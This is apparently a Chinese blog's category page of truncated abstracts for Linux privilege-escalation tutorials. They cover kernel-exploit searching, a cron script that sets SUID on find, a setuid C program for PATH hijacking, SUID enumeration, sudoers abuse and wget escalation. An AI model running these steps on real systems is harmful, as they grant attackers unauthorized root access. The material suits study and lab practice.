随笔分类 -  Linux

内核提权
摘要:一、信息搜集 cat /etc/issue cat /etc/*-release uname -a lsb_release -a 二、查询exp root@nullbyte:~# searchsploit privilege | grep -i linux | grep -i kernel | gr 阅读全文
posted @ 2020-12-27 16:24 lnterpreter 阅读(192) 评论(0) 推荐(0)
计划任务
摘要:一、计划任务文件 /etc/crontab 二、创建任务脚本,并赋值权限可执行 #!/usr/bin/env python import os import sys try: os.system('chmod u+s /usr/bin/find') except: sys.exit() 三、创建计划 阅读全文
posted @ 2020-12-16 18:06 lnterpreter 阅读(143) 评论(0) 推荐(0)
PATH变量提权
摘要:一、创建一个脚本1.c #include<stdio.h> #include<unistd.h> #include<sys/types.h> int main() { setuid(geteuid()); system("ps"); return 0; } 二、编译脚本,并给它S权限 gcc 1.c 阅读全文
posted @ 2020-12-16 15:22 lnterpreter 阅读(247) 评论(0) 推荐(0)
SUID
摘要:一、权限 二、S权限 chmod 4755 文件名 chmod u+s 文件名 //u代表当前用户 三、查找SUID权限 //find代表查找,/代表根目录,-perm代表权限,-u代表当前用户,s代表s权限,type代表类型,f为二进制文件,2代表错误,/dev/null代表文件 find / - 阅读全文
posted @ 2020-12-15 16:38 lnterpreter 阅读(148) 评论(0) 推荐(0)
用户信息
摘要:一、账号密码 /etc/passwd //保存用户信息 /etc/shadom // 保存用户密码信息 /etc/group //保存用户所属组信息 用户名:密码:uid:gid:用户信息:用户目录:用户默认使用shell路径 1、密码为*表示没有密码 2、uid表示用户标识,默认uid范围在0-9 阅读全文
posted @ 2020-12-15 15:56 lnterpreter 阅读(631) 评论(0) 推荐(0)
Linux远程认证安全
摘要:一、实验环境配置 1、SSH服务安装 sudo apt install openssh-server 2、启动服务端 sudo service ssh start 3、重新启动服务端 sudo service ssh restart 二、连接服务器(默认22端口) 1、ssh -p 端口号 用户名@ 阅读全文
posted @ 2020-11-25 12:19 lnterpreter 阅读(122) 评论(0) 推荐(0)
sudo命令利用
摘要:一、sudoers文件规则 sudo命令的配置文件保存在/etc/sudoers文件中,可以使用cat命令查看文件内容 //root(用户名),第一个ALL表示所有的终端,第二个ALL表示所有用户,第三个ALL表示所有组,第四个ALL表示所有命令 root ALL=(ALL:ALL) ALL 二、s 阅读全文
posted @ 2020-11-23 18:03 lnterpreter 阅读(261) 评论(0) 推荐(0)
计划任务提权
摘要:一、实验环境 1、在crontab(/etc/crontab)下设置一个新的计划任务来运行一个python脚本,该脚本删除特定目录中的所有数据 python脚本 #!/usr/bin/env python import os import sys try: os.system('rm -f /hom 阅读全文
posted @ 2020-11-23 17:17 lnterpreter 阅读(906) 评论(0) 推荐(0)
wget提权
摘要:一、获取权限 首先获取一个低权限 二、SUID 查看SUID能执行文件所有文件 #以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令,一个一个试 find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4 阅读全文
posted @ 2020-11-18 17:49 lnterpreter 阅读(697) 评论(0) 推荐(0)